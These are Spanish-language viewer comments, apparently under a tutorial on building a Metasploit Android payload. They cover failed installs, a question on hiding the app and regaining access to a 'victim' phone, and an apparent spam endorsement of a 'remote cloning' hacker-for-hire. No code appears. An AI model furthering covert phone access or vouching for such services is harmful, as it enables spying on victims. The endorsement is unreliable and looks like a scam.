No... Pq no se establece la conexion.. Para que eso ocurra hay q saber un poco mas... Si desinstalas la app es como si cortaras el cable del telwfono fijo...
En mi Android me indica que la aplicacion fue hecha en una version anterior, no me muestra la sesion iniciada
A mi me dice lo mismo
Me siento muy orgulloso de que seas Dominicano
Cuando instalo la apk en el movil, me sale que la apk se creo para una version anterior de Android y sale como que no ejecutara en kali.
Rexx_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria.
Muchas gracias (Rexx_spycode).
él está en IG con 2k seguidores y 1
siguiendo.
tengas unas preguntas: se puede ocultar la app una vez instalada? y una vez dentro de la victima al yo salirme de metasploit y después quiero volver a entrar a ese dispositivo como haría para volver a entrar?
X2
yo tambien tengo el mismo problema }
el mejor videos explicado que he visto por ahora.
Que genial, pero viendo la otra cara de la moneda como te das cuenta que te instalarón algún troyano?